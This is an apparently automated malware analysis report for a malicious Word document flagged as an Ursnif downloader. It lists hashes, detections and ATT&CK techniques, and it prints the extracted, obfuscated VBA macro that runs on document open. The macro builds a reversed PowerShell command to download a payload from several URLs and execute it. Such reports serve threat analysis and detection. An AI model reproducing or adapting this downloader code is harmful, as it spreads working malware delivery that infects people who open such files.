Office (OLE) malware analysis — malicious · d989e99bef447192

MALICIOUS

Office (OLE)

65.9 KB Created: 2018-09-05 10:44:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: af4a876aaf10365303cd98ecb45d80ff SHA-1: a98aacdc7c731a07a826d3f3820319643dba7b1c SHA-256: d989e99bef4471920aed8d190b3818be2fbd9957d70ce334259cf2719af4f98f

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Document_Open macro executes a Shell() command, which is used to construct and run a command-line string. This string appears to be designed to download and execute a second-stage payload, as indicated by the reconstructed command: 'cmd /V:ON/C set BQX9= }{;kact;wfm$ metI-ekovnI;) wfm$ ,vmU $(eliFdao lwoD.jiF${yrt}{ HZ$ ni v mU$(hcaerof; 'e xe.' + ' c'. The ClamAV detection also points to a downloader family.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4608 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4608 bytes
SHA-256: `f1fc30de85d3d49abcab9506a45d81306556d468d43b8fd1f54ff835f0558c10`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WCwQznHLcUq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Hour "45695318" + "497880431" + "368420336" + "Kq" Hour "261857369" + "IHUiYIU" Hour "MhbG" + "Jp" + "Dh" + "8832" Hour "6250" + "ca" + "90484060" + "wuaNvw" VBA.Shell CleanString(bDz) + baZRzAjX + MaQGmoTmNz + rTbiFCWCIAb + CstXEQRE + nmPFZTfwFUMR + MhMjsiOjc, 21 - 21 Hour "wX" + "bmZjHYX" + "446343545" + "469253301" Hour "rzT" + "399519562" Hour "aPOHRmUAomn" + "u" End Sub Attribute VB_Name = "TRzEQooi" Function rTbiFCWCIAb() On _ Error _ Resume _ Next Hour "7350" + "6518" Hour "FojzYaNCu" + "jIf" + "1725" + "5423" Hour "258508250" + "428513791" Hour "mp" + "rH" + "7755" + "459352342" MBLtvrQ = "cmd /V" + "^:^ON/C" + Chr(1 + 3 + 4 + 3 + 23) + "^s^e^" + "t B^" + "Q^X^" + "9= ^ " + "^" + " " + " ^ " + "^ " + " ^ }}{" Hour "51420072" + "PRLdN" + "46463258" + "VNVG" Hour "o" + "FzjwWRhVQ" + "NFz" + "FmaDwGjG" DuRjicQh = "hc^t^a" + "c" + "};k" + "a^er^b" + ";wf" + "m^$" + " me^t^I" + "^-^ek" + "ovn^I^" + ";)" + "^wf^m^$" + "^ ^,vm" + "U" Hour "2438" + "233338130" + "229787327" + "juVnZIn" Hour "jOIKfXsuAbQH" + "9116" pvorCz = "^$(^e" + "^liF" + "^da" + "o^ln^" + "wo^D.ji" + "F^${yrt" + "{)^" + "HZ^" + "O$^ n^i" + " v" Hour "i" + "FJhNwkzHn" + "MhrbZbG" + "248662824" IwwUkLR = "^m^U" + "$(^hc" + "a^er" + "^of^" + ";^'e" + "^xe" + ".^'" + "+^z^Z" + "C" + "$+" + "^" + "'\'^+c" Hour "PYb" + "193772078" Hour "GmTjUONEsCi" + "dkiIDrAjM" + "A" + "jHZREQhi" Hour "cvD" + "DFhEBH" + "wvLDcFSCcW" + "389180915" Hour "463389409" + "szjbS" + "wd" + "YvddVMWMj" Hour "bzlczMp" + "AcVwfEsjcbZrh" aVqHBH = "il" + "^bu" + "^p:vne^" + "$^=wfm^" + "$;'8^55" + "^'^ ^= " + "^z^ZC" + "^$^;)'" + "@'(t^i" + "^lpS.'" + "f" + "^d^2P" Hour "3146" + "Ycfu" Hour "7202" + "j" + "s" + "6596" Hour "hw" + "lpSXTov" YLaJrJXF = "^WN^DjM" + "/" + "^xm" + ".^mo" + "c^." rTbiFCWCIAb = MBLtvrQ + DuRjicQh + pvorCz + IwwUkLR + aVqHBH + YLaJrJXF Hour "252349632" + "Yz" Hour "iHnYw" + "7580" End Function Function CstXEQRE() On _ Error _ Resume _ Next Hour "123967029" + "343368036" + "8000" + "UuXiEIBWfWh" Hour "198568949" + "1088" Hour "293932554" + "2851" KZzVJozo = "tes^a^j" + "/" + "/^:^" + "pt^th@^" + "5n^8^6V" + "q^hs8/" + "^b" + "^ulc.e" + "n^ineh" + "^t/" + "/^" + ":^p" + "t^th^" Hour "rdKPiDZ" + "523" + "MDoS" + "T" Hour "4596" + "jKDQfKVkn" Hour "RznpmBovPSjG" + "468749720" + "LTI" + "lo" Hour "lA" + "9164" Hour "zf" + "JsqMqsTRq" + "119714309" + "FoMwwp" iTVIioEKNGu = "@pnSH^" + "Om^1" + "/" + "^sr.vs" + "^j" + "/" + "/^:^p" + "^" + "t" + "^th^" + "@6C^8" Hour "cr" + "ocJqCmnzlWU" Hour "M" + "SFBkjB" + "iDUUR" + "ftLbEXwS" Hour "GfvUmzDH" + "5774" CRZpwJH = "^" + "k^d^" + "0^Q^H" + "^U/u" + "r.nnov^" + "o^ki^" + "l^u" + "k" + "//:^pt" + "th" + "@^" Hour "350361319" + "OKd" Hour "3922" + "240794620" ldoiUX = "U7" + "c^Pk" + "^49d^K^" + "U/^" + "ur^." + "^hsim" + "i" + "/" Hour "490064355" + "117328727" + "373166073" + "vF" Hour "ifA" + "8119" uOEiHjQ = "/^:^" + "p^t" + "^th" + "^" + "'=H^ZO$" + ";^tne" + "^i^lC" + "b" Hour "OoGXzujwfcsUJb" + "iW" + "174076733" + "6960" Hour "3978" + "TEbo" + "tXYJYHn" + "OWFcwGO" QQlGGGWawp = "e^W.t^" + "eN^" + " ^tce^" + "jbo" + "-wen^=^" + "j^i^F" + "$ l^le" + "h^srew" + "^o^" + "p" + "&&^fo" + "r /^L %" Hour "3920" + "6248" Hour "7235" + "VZVav" + "353840032" + "d" Hour "6150" + "jdcV" Hour "236548786" + "135836334" + "380056020" + "KRD" QHXFAW = "^" + "6 ^in (" + "^3" + "49^;^" + "-^1^" + ";^0)^" + "do " + "^s^et" + " e^I=!e" Hour "129717821" + "KbSc" + "cmuZs" + "kPTJ" Hour "1068" + "pGGmVbj" Hour "6426" + "2817" + "5767" + "127656302" Hour "jXnFOETb" + "fcw" JVwBwiRGjP = "^I!!B^Q ... (truncated)

SHA-256: f1fc30de85d3d49abcab9506a45d81306556d468d43b8fd1f54ff835f0558c10

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WCwQznHLcUq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Hour "45695318" + "497880431" + "368420336" + "Kq"
   Hour "261857369" + "IHUiYIU"
   Hour "MhbG" + "Jp" + "Dh" + "8832"
   Hour "6250" + "ca" + "90484060" + "wuaNvw"
VBA.Shell CleanString(bDz) + baZRzAjX + MaQGmoTmNz + rTbiFCWCIAb + CstXEQRE + nmPFZTfwFUMR + MhMjsiOjc, 21 - 21
   Hour "wX" + "bmZjHYX" + "446343545" + "469253301"
   Hour "rzT" + "399519562"
   Hour "aPOHRmUAomn" + "u"
End Sub



Attribute VB_Name = "TRzEQooi"
Function rTbiFCWCIAb()

On _
Error _
Resume _
Next
Hour "7350" + "6518"
   Hour "FojzYaNCu" + "jIf" + "1725" + "5423"
   Hour "258508250" + "428513791"
   Hour "mp" + "rH" + "7755" + "459352342"
MBLtvrQ = "cmd /V" + "^:^ON/C" + Chr(1 + 3 + 4 + 3 + 23) + "^s^e^" + "t B^" + "Q^X^" + "9=  ^ " + "^" + "   " + "   ^  " + "^   " + "  ^ }}{"
Hour "51420072" + "PRLdN" + "46463258" + "VNVG"
   Hour "o" + "FzjwWRhVQ" + "NFz" + "FmaDwGjG"
DuRjicQh = "hc^t^a" + "c" + "};k" + "a^er^b" + ";wf" + "m^$" + " me^t^I" + "^-^ek" + "ovn^I^" + ";)" + "^wf^m^$" + "^ ^,vm" + "U"
Hour "2438" + "233338130" + "229787327" + "juVnZIn"
   Hour "jOIKfXsuAbQH" + "9116"
pvorCz = "^$(^e" + "^liF" + "^da" + "o^ln^" + "wo^D.ji" + "F^${yrt" + "{)^" + "HZ^" + "O$^ n^i" + " v"
Hour "i" + "FJhNwkzHn" + "MhrbZbG" + "248662824"
IwwUkLR = "^m^U" + "$(^hc" + "a^er" + "^of^" + ";^'e" + "^xe" + ".^'" + "+^z^Z" + "C" + "$+" + "^" + "'\'^+c"
Hour "PYb" + "193772078"
   Hour "GmTjUONEsCi" + "dkiIDrAjM" + "A" + "jHZREQhi"
   Hour "cvD" + "DFhEBH" + "wvLDcFSCcW" + "389180915"
   Hour "463389409" + "szjbS" + "wd" + "YvddVMWMj"
   Hour "bzlczMp" + "AcVwfEsjcbZrh"
aVqHBH = "il" + "^bu" + "^p:vne^" + "$^=wfm^" + "$;'8^55" + "^'^ ^= " + "^z^ZC" + "^$^;)'" + "@'(t^i" + "^lpS.'" + "f" + "^d^2P"
Hour "3146" + "Ycfu"
   Hour "7202" + "j" + "s" + "6596"
   Hour "hw" + "lpSXTov"
YLaJrJXF = "^WN^DjM" + "/" + "^xm" + ".^mo" + "c^."
rTbiFCWCIAb = MBLtvrQ + DuRjicQh + pvorCz + IwwUkLR + aVqHBH + YLaJrJXF
   Hour "252349632" + "Yz"
   Hour "iHnYw" + "7580"
End Function
Function CstXEQRE()

On _
Error _
Resume _
Next
Hour "123967029" + "343368036" + "8000" + "UuXiEIBWfWh"
   Hour "198568949" + "1088"
   Hour "293932554" + "2851"
KZzVJozo = "tes^a^j" + "/" + "/^:^" + "pt^th@^" + "5n^8^6V" + "q^hs8/" + "^b" + "^ulc.e" + "n^ineh" + "^t/" + "/^" + ":^p" + "t^th^"
Hour "rdKPiDZ" + "523" + "MDoS" + "T"
   Hour "4596" + "jKDQfKVkn"
   Hour "RznpmBovPSjG" + "468749720" + "LTI" + "lo"
   Hour "lA" + "9164"
   Hour "zf" + "JsqMqsTRq" + "119714309" + "FoMwwp"
iTVIioEKNGu = "@pnSH^" + "Om^1" + "/" + "^sr.vs" + "^j" + "/" + "/^:^p" + "^" + "t" + "^th^" + "@6C^8"
Hour "cr" + "ocJqCmnzlWU"
   Hour "M" + "SFBkjB" + "iDUUR" + "ftLbEXwS"
   Hour "GfvUmzDH" + "5774"
CRZpwJH = "^" + "k^d^" + "0^Q^H" + "^U/u" + "r.nnov^" + "o^ki^" + "l^u" + "k" + "//:^pt" + "th" + "@^"
Hour "350361319" + "OKd"
   Hour "3922" + "240794620"
ldoiUX = "U7" + "c^Pk" + "^49d^K^" + "U/^" + "ur^." + "^hsim" + "i" + "/"
Hour "490064355" + "117328727" + "373166073" + "vF"
   Hour "ifA" + "8119"
uOEiHjQ = "/^:^" + "p^t" + "^th" + "^" + "'=H^ZO$" + ";^tne" + "^i^lC" + "b"
Hour "OoGXzujwfcsUJb" + "iW" + "174076733" + "6960"
   Hour "3978" + "TEbo" + "tXYJYHn" + "OWFcwGO"
QQlGGGWawp = "e^W.t^" + "eN^" + " ^tce^" + "jbo" + "-wen^=^" + "j^i^F" + "$ l^le" + "h^srew" + "^o^" + "p" + "&&^fo" + "r /^L %"
Hour "3920" + "6248"
   Hour "7235" + "VZVav" + "353840032" + "d"
   Hour "6150" + "jdcV"
   Hour "236548786" + "135836334" + "380056020" + "KRD"
QHXFAW = "^" + "6 ^in (" + "^3" + "49^;^" + "-^1^" + ";^0)^" + "do " + "^s^et" + " e^I=!e"
Hour "129717821" + "KbSc" + "cmuZs" + "kPTJ"
   Hour "1068" + "pGGmVbj"
   Hour "6426" + "2817" + "5767" + "127656302"
   Hour "jXnFOETb" + "fcw"
JVwBwiRGjP = "^I!!B^Q
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.